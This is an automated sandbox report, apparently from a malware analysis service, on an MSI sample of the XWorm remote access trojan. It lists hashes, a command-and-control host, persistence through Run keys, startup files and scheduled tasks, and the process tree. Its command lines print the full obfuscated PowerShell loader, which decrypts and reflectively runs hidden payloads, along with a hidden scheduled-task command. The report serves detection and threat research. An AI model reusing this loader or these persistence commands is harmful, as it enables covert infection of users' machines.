xworm | 594e87ea4d40331411e9b52033db03db5fd2399c023b3f132f277b6ad40535d4

Analysis

max time kernel
300s
max time network
305s
platform
windows11-21h2_x64
resource
win11-20240419-en
resource tags

arch:x64arch:x86image:win11-20240419-enlocale:en-usos:windows11-21h2-x64system
submitted
11-05-2024 08:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

test.msi
Size

1.1MB
MD5

0dbd897947fd3fd75af9b67b8517d2f4
SHA1

ef3fb6baf23c3228a9dc9751f1af5178c12d5a33
SHA256

594e87ea4d40331411e9b52033db03db5fd2399c023b3f132f277b6ad40535d4
SHA512

b43547b23a1969da024bfaed654bcf6fca167962dd09810191e3ee838460b66ba92307009d0034efb9c08fc80f374ceff612b83a5f8a840bbb6b56f42c9183ab
SSDEEP

24576:xEfVw748eBaCifrIFI24kuMdJhycvkA5nY28ERhpZQKAv671XlmEtnOr:xEyc8eorIF74kuMdJ0cvtnY28ERh/QwC

Score

10^/10

xworm execution persistence rat trojan

Malware Config

Extracted

Family

xworm

case-shield.gl.at.ply.gg:26501

Attributes

Install_directory
%Userprofile%
install_file
system.exe

Signatures

Detect Xworm Payload 1 IoCs

Processes:

resource	yara_rule
behavioral3/memory/2148-111-0x0000000007DD0000-0x0000000007DEC000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

4 2148 powershell.exe
5 2148 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid process

3316 powershell.exe
3344 powershell.exe
2148 powershell.exe
2308 powershell.exe
856 powershell.exe
1184 powershell.exe
1480 powershell.exe

flow	pid	process
4	2148	powershell.exe
5	2148	powershell.exe

pid	process
3316	powershell.exe
3344	powershell.exe
2148	powershell.exe
2308	powershell.exe
856	powershell.exe
1184	powershell.exe
1480	powershell.exe

Drops startup file 3 IoCs

Processes:

TBYPAE.exepowershell.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OSBLTR.lnk	TBYPAE.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\system.lnk	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\system.lnk	powershell.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

TBYPAE.exepowershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Microsoft\Windows\CurrentVersion\Run\OSBLTR = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windata\\system.exe\""	TBYPAE.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Microsoft\Windows\CurrentVersion\Run\system = "C:\\Users\\Admin\\system.exe"	powershell.exe

Enumerates connected drives 3 TTPs 46 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

msiexec.exemsiexec.exe

description	ioc	process
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

1 ip-api.com

flow	ioc
1	ip-api.com

AutoIT Executable 35 IoCs

AutoIT scripts compiled to PE executables.

Processes:

resource	yara_rule
behavioral3/memory/1728-91-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral3/memory/5032-115-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral3/memory/5032-197-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral3/memory/5032-205-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral3/memory/5032-206-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral3/memory/5032-207-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral3/memory/5032-211-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral3/memory/5032-213-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral3/memory/1520-216-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral3/memory/5032-226-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral3/memory/5032-227-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral3/memory/5032-228-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral3/memory/5032-229-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral3/memory/5032-230-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral3/memory/5032-231-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral3/memory/4216-233-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral3/memory/4216-234-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral3/memory/5032-235-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral3/memory/5032-236-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral3/memory/5032-237-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral3/memory/5032-238-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral3/memory/5032-239-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral3/memory/5032-240-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral3/memory/1116-243-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral3/memory/5032-244-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral3/memory/5032-245-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral3/memory/5032-246-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral3/memory/5032-247-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral3/memory/5032-248-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral3/memory/5032-249-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral3/memory/428-251-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral3/memory/5032-252-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral3/memory/5032-253-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral3/memory/5032-254-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral3/memory/5032-255-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe

Drops file in Windows directory 12 IoCs

Processes:

msiexec.exe

description	ioc	process
File opened for modification	C:\Windows\Installer\MSI737B.tmp	msiexec.exe
File created	C:\Windows\SystemTemp\~DFED102D58090E47B8.TMP	msiexec.exe
File created	C:\Windows\Installer\e577251.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\e577251.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File created	C:\Windows\SystemTemp\~DF224A41F7E6971C53.TMP	msiexec.exe
File created	C:\Windows\Installer\SourceHash{29EF7317-DCA1-4159-97B2-C883AD400AC6}	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File created	C:\Windows\SystemTemp\~DF781A50BBA8DC6D03.TMP	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI730D.tmp	msiexec.exe
File created	C:\Windows\SystemTemp\~DFF9A4CDF0740A757B.TMP	msiexec.exe

Executes dropped EXE 8 IoCs

Processes:

MSI737B.tmpTBYPAE.exesystem.exesystem.exesystem.exesystem.exesystem.exesystem.exe

pid process

1076 MSI737B.tmp
5032 TBYPAE.exe
1728 system.exe
1520 system.exe
3440 system.exe
4216 system.exe
1116 system.exe
428 system.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
1076	MSI737B.tmp
5032	TBYPAE.exe
1728	system.exe
1520	system.exe
3440	system.exe
4216	system.exe
1116	system.exe
428	system.exe

Checks SCSI registry key(s) 3 TTPs 5 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

vssvc.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000d35e07e9a716e6840000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000d35e07e90000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff000000000700010000680900d35e07e9000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1dd35e07e9000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000d35e07e900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exe

pid process

1732 schtasks.exe
4180 schtasks.exe
Modifies registry class 1 IoCs

Processes:

powershell.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings powershell.exe

pid	process
1732	schtasks.exe
4180	schtasks.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

msiexec.exeTBYPAE.exe

pid	process
2352	msiexec.exe
2352	msiexec.exe
5032	TBYPAE.exe
5032	TBYPAE.exe
5032	TBYPAE.exe
5032	TBYPAE.exe
5032	TBYPAE.exe
5032	TBYPAE.exe
5032	TBYPAE.exe
5032	TBYPAE.exe
5032	TBYPAE.exe
5032	TBYPAE.exe
5032	TBYPAE.exe
5032	TBYPAE.exe
5032	TBYPAE.exe
5032	TBYPAE.exe
5032	TBYPAE.exe
5032	TBYPAE.exe
5032	TBYPAE.exe
5032	TBYPAE.exe
5032	TBYPAE.exe
5032	TBYPAE.exe
5032	TBYPAE.exe
5032	TBYPAE.exe
5032	TBYPAE.exe
5032	TBYPAE.exe
5032	TBYPAE.exe
5032	TBYPAE.exe
5032	TBYPAE.exe
5032	TBYPAE.exe
5032	TBYPAE.exe
5032	TBYPAE.exe
5032	TBYPAE.exe
5032	TBYPAE.exe
5032	TBYPAE.exe
5032	TBYPAE.exe
5032	TBYPAE.exe
5032	TBYPAE.exe
5032	TBYPAE.exe
5032	TBYPAE.exe
5032	TBYPAE.exe
5032	TBYPAE.exe
5032	TBYPAE.exe
5032	TBYPAE.exe
5032	TBYPAE.exe
5032	TBYPAE.exe
5032	TBYPAE.exe
5032	TBYPAE.exe
5032	TBYPAE.exe
5032	TBYPAE.exe
5032	TBYPAE.exe
5032	TBYPAE.exe
5032	TBYPAE.exe
5032	TBYPAE.exe
5032	TBYPAE.exe
5032	TBYPAE.exe
5032	TBYPAE.exe
5032	TBYPAE.exe
5032	TBYPAE.exe
5032	TBYPAE.exe
5032	TBYPAE.exe
5032	TBYPAE.exe
5032	TBYPAE.exe
5032	TBYPAE.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

TBYPAE.exe

pid process

5032 TBYPAE.exe

pid	process
5032	TBYPAE.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

msiexec.exemsiexec.exevssvc.exepowershell.exepowershell.exe

description	pid	process
Token: SeShutdownPrivilege	260	msiexec.exe
Token: SeIncreaseQuotaPrivilege	260	msiexec.exe
Token: SeSecurityPrivilege	2352	msiexec.exe
Token: SeCreateTokenPrivilege	260	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	260	msiexec.exe
Token: SeLockMemoryPrivilege	260	msiexec.exe
Token: SeIncreaseQuotaPrivilege	260	msiexec.exe
Token: SeMachineAccountPrivilege	260	msiexec.exe
Token: SeTcbPrivilege	260	msiexec.exe
Token: SeSecurityPrivilege	260	msiexec.exe
Token: SeTakeOwnershipPrivilege	260	msiexec.exe
Token: SeLoadDriverPrivilege	260	msiexec.exe
Token: SeSystemProfilePrivilege	260	msiexec.exe
Token: SeSystemtimePrivilege	260	msiexec.exe
Token: SeProfSingleProcessPrivilege	260	msiexec.exe
Token: SeIncBasePriorityPrivilege	260	msiexec.exe
Token: SeCreatePagefilePrivilege	260	msiexec.exe
Token: SeCreatePermanentPrivilege	260	msiexec.exe
Token: SeBackupPrivilege	260	msiexec.exe
Token: SeRestorePrivilege	260	msiexec.exe
Token: SeShutdownPrivilege	260	msiexec.exe
Token: SeDebugPrivilege	260	msiexec.exe
Token: SeAuditPrivilege	260	msiexec.exe
Token: SeSystemEnvironmentPrivilege	260	msiexec.exe
Token: SeChangeNotifyPrivilege	260	msiexec.exe
Token: SeRemoteShutdownPrivilege	260	msiexec.exe
Token: SeUndockPrivilege	260	msiexec.exe
Token: SeSyncAgentPrivilege	260	msiexec.exe
Token: SeEnableDelegationPrivilege	260	msiexec.exe
Token: SeManageVolumePrivilege	260	msiexec.exe
Token: SeImpersonatePrivilege	260	msiexec.exe
Token: SeCreateGlobalPrivilege	260	msiexec.exe
Token: SeBackupPrivilege	2744	vssvc.exe
Token: SeRestorePrivilege	2744	vssvc.exe
Token: SeAuditPrivilege	2744	vssvc.exe
Token: SeBackupPrivilege	2352	msiexec.exe
Token: SeRestorePrivilege	2352	msiexec.exe
Token: SeRestorePrivilege	2352	msiexec.exe
Token: SeTakeOwnershipPrivilege	2352	msiexec.exe
Token: SeRestorePrivilege	2352	msiexec.exe
Token: SeTakeOwnershipPrivilege	2352	msiexec.exe
Token: SeRestorePrivilege	2352	msiexec.exe
Token: SeTakeOwnershipPrivilege	2352	msiexec.exe
Token: SeRestorePrivilege	2352	msiexec.exe
Token: SeTakeOwnershipPrivilege	2352	msiexec.exe
Token: SeRestorePrivilege	2352	msiexec.exe
Token: SeTakeOwnershipPrivilege	2352	msiexec.exe
Token: SeDebugPrivilege	3316	powershell.exe
Token: SeDebugPrivilege	3344	powershell.exe
Token: SeIncreaseQuotaPrivilege	3344	powershell.exe
Token: SeSecurityPrivilege	3344	powershell.exe
Token: SeTakeOwnershipPrivilege	3344	powershell.exe
Token: SeLoadDriverPrivilege	3344	powershell.exe
Token: SeSystemProfilePrivilege	3344	powershell.exe
Token: SeSystemtimePrivilege	3344	powershell.exe
Token: SeProfSingleProcessPrivilege	3344	powershell.exe
Token: SeIncBasePriorityPrivilege	3344	powershell.exe
Token: SeCreatePagefilePrivilege	3344	powershell.exe
Token: SeBackupPrivilege	3344	powershell.exe
Token: SeRestorePrivilege	3344	powershell.exe
Token: SeShutdownPrivilege	3344	powershell.exe
Token: SeDebugPrivilege	3344	powershell.exe
Token: SeSystemEnvironmentPrivilege	3344	powershell.exe
Token: SeRemoteShutdownPrivilege	3344	powershell.exe

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

msiexec.exe

pid process

260 msiexec.exe
260 msiexec.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

powershell.exe

pid process

2148 powershell.exe

pid	process
260	msiexec.exe
260	msiexec.exe

pid	process
2148	powershell.exe

Suspicious use of WriteProcessMemory 50 IoCs

Processes:

msiexec.exeMSI737B.tmpTBYPAE.execmd.execmd.exepowershell.exeWScript.execmd.exepowershell.exe

description	pid	process	target process
PID 2352 wrote to memory of 3812	2352	msiexec.exe	srtasks.exe
PID 2352 wrote to memory of 3812	2352	msiexec.exe	srtasks.exe
PID 2352 wrote to memory of 1076	2352	msiexec.exe	MSI737B.tmp
PID 2352 wrote to memory of 1076	2352	msiexec.exe	MSI737B.tmp
PID 2352 wrote to memory of 1076	2352	msiexec.exe	MSI737B.tmp
PID 1076 wrote to memory of 4808	1076	MSI737B.tmp	cmd.exe
PID 1076 wrote to memory of 4808	1076	MSI737B.tmp	cmd.exe
PID 1076 wrote to memory of 4808	1076	MSI737B.tmp	cmd.exe
PID 1076 wrote to memory of 5032	1076	MSI737B.tmp	TBYPAE.exe
PID 1076 wrote to memory of 5032	1076	MSI737B.tmp	TBYPAE.exe
PID 1076 wrote to memory of 5032	1076	MSI737B.tmp	TBYPAE.exe
PID 5032 wrote to memory of 2732	5032	TBYPAE.exe	cmd.exe
PID 5032 wrote to memory of 2732	5032	TBYPAE.exe	cmd.exe
PID 5032 wrote to memory of 2732	5032	TBYPAE.exe	cmd.exe
PID 5032 wrote to memory of 3024	5032	TBYPAE.exe	WSCript.exe
PID 5032 wrote to memory of 3024	5032	TBYPAE.exe	WSCript.exe
PID 5032 wrote to memory of 3024	5032	TBYPAE.exe	WSCript.exe
PID 2732 wrote to memory of 1732	2732	cmd.exe	schtasks.exe
PID 2732 wrote to memory of 1732	2732	cmd.exe	schtasks.exe
PID 2732 wrote to memory of 1732	2732	cmd.exe	schtasks.exe
PID 4808 wrote to memory of 3316	4808	cmd.exe	powershell.exe
PID 4808 wrote to memory of 3316	4808	cmd.exe	powershell.exe
PID 4808 wrote to memory of 3316	4808	cmd.exe	powershell.exe
PID 3316 wrote to memory of 3344	3316	powershell.exe	powershell.exe
PID 3316 wrote to memory of 3344	3316	powershell.exe	powershell.exe
PID 3316 wrote to memory of 3344	3316	powershell.exe	powershell.exe
PID 3316 wrote to memory of 2440	3316	powershell.exe	WScript.exe
PID 3316 wrote to memory of 2440	3316	powershell.exe	WScript.exe
PID 3316 wrote to memory of 2440	3316	powershell.exe	WScript.exe
PID 2440 wrote to memory of 1000	2440	WScript.exe	cmd.exe
PID 2440 wrote to memory of 1000	2440	WScript.exe	cmd.exe
PID 2440 wrote to memory of 1000	2440	WScript.exe	cmd.exe
PID 1000 wrote to memory of 2148	1000	cmd.exe	powershell.exe
PID 1000 wrote to memory of 2148	1000	cmd.exe	powershell.exe
PID 1000 wrote to memory of 2148	1000	cmd.exe	powershell.exe
PID 2148 wrote to memory of 2308	2148	powershell.exe	powershell.exe
PID 2148 wrote to memory of 2308	2148	powershell.exe	powershell.exe
PID 2148 wrote to memory of 2308	2148	powershell.exe	powershell.exe
PID 2148 wrote to memory of 856	2148	powershell.exe	powershell.exe
PID 2148 wrote to memory of 856	2148	powershell.exe	powershell.exe
PID 2148 wrote to memory of 856	2148	powershell.exe	powershell.exe
PID 2148 wrote to memory of 1184	2148	powershell.exe	powershell.exe
PID 2148 wrote to memory of 1184	2148	powershell.exe	powershell.exe
PID 2148 wrote to memory of 1184	2148	powershell.exe	powershell.exe
PID 2148 wrote to memory of 1480	2148	powershell.exe	powershell.exe
PID 2148 wrote to memory of 1480	2148	powershell.exe	powershell.exe
PID 2148 wrote to memory of 1480	2148	powershell.exe	powershell.exe
PID 2148 wrote to memory of 4180	2148	powershell.exe	schtasks.exe
PID 2148 wrote to memory of 4180	2148	powershell.exe	schtasks.exe
PID 2148 wrote to memory of 4180	2148	powershell.exe	schtasks.exe

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\system32\msiexec.exe
msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\test.msi
1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:260

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2352

C:\Windows\system32\srtasks.exe
C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
2⤵
PID:3812

C:\Windows\Installer\MSI737B.tmp
"C:\Windows\Installer\MSI737B.tmp"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1076

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\loader (5).bat" "
3⤵
- Suspicious use of WriteProcessMemory
PID:4808

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zzKVnsJKnozsmwXvfEHuC6CO4y3J9kqI8i4PQxgBEQY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4Zet+bBMxhydASTp2X5UNA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $qKnYN=New-Object System.IO.MemoryStream(,$param_var); $QRXYz=New-Object System.IO.MemoryStream; $ylerv=New-Object System.IO.Compression.GZipStream($qKnYN, [IO.Compression.CompressionMode]::Decompress); $ylerv.CopyTo($QRXYz); $ylerv.Dispose(); $qKnYN.Dispose(); $QRXYz.Dispose(); $QRXYz.ToArray();}function execute_function($param_var,$param2_var){ $eVLsQ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $Nfhti=$eVLsQ.EntryPoint; $Nfhti.Invoke($null, $param2_var);}$SyUpl = 'C:\Users\Admin\AppData\Local\Temp\loader (5).bat';$host.UI.RawUI.WindowTitle = $SyUpl;$TCVQo=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($SyUpl).Split([Environment]::NewLine);foreach ($hHqem in $TCVQo) { if ($hHqem.StartsWith(':: ')) { $FEGCp=$hHqem.Substring(3); break; }}$payloads_var=[string[]]$FEGCp.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
4⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3316

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_14_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_14.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:3344

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_14.vbs"
5⤵
- Suspicious use of WriteProcessMemory
PID:2440

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_14.bat" "
6⤵
- Suspicious use of WriteProcessMemory
PID:1000

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zzKVnsJKnozsmwXvfEHuC6CO4y3J9kqI8i4PQxgBEQY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4Zet+bBMxhydASTp2X5UNA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $qKnYN=New-Object System.IO.MemoryStream(,$param_var); $QRXYz=New-Object System.IO.MemoryStream; $ylerv=New-Object System.IO.Compression.GZipStream($qKnYN, [IO.Compression.CompressionMode]::Decompress); $ylerv.CopyTo($QRXYz); $ylerv.Dispose(); $qKnYN.Dispose(); $QRXYz.Dispose(); $QRXYz.ToArray();}function execute_function($param_var,$param2_var){ $eVLsQ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $Nfhti=$eVLsQ.EntryPoint; $Nfhti.Invoke($null, $param2_var);}$SyUpl = 'C:\Users\Admin\AppData\Roaming\startup_str_14.bat';$host.UI.RawUI.WindowTitle = $SyUpl;$TCVQo=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($SyUpl).Split([Environment]::NewLine);foreach ($hHqem in $TCVQo) { if ($hHqem.StartsWith(':: ')) { $FEGCp=$hHqem.Substring(3); break; }}$payloads_var=[string[]]$FEGCp.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
7⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2148

